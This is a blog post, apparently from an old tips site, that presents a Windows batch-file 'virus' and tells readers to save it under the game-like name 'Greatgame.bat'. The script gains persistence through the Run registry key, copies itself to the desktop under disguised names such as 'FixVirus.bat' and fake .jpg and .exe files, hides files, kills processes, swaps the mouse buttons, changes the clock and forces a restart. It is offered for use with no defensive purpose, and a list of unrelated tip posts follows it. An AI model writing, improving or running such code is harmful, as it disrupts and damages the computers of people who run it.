How to create a Dangerous virus using Batch programming ?

In this post i am going to give you dangerous virus code which is written in Batch Programming language.

Virus can do:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer

copy this code into notepad and save as Greatgame.bat(while saving select all files instead of text ).

Here is the Code:

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

Related Posts:

  • How to create a Dangerous virus using Batch programming ?In this post i am going to give you dangerous virus code which is written in Batch Programming language. Virus can do: 1.Copy itself into startup 2.Copy itself over one thousand times into random spots in your computer. 3.Hi… Read More
  • How To Make Invisible FolderThis is a trick to make a folder invisible. We are not going to try to hide the file anywhere. In fact the folder would be right before your eyes but you can’t see it. Sounds intriguing? Actually it is very simple – jus… Read More
  • Cool Trick with Google ImagesJust browsing through the internet this morning and found this cool trick with Google Images and want to share it with you guys! 1. First go to Google Images : images.google.com 2. Search for anything you want like "flowers … Read More
  • Log into Two/ Multiple Yahoo Messengers at the same timeHave multiple yahoo accounts ? Tired switching between the messenger accounts one by one..? This tip is for you.. Usually , if we have multiple yahoo accounts , you must have to log out of the current messenger id if you w… Read More
  • Firefox 4 vs. Chrome 11 BetaFirefox 4 vs. Chrome 11 Beta It was a big week in the never-ending Internet browsers race. First, Firefox 4 was finally launched two days ago  – last of the next generation browsers to hit the market,  trailing … Read More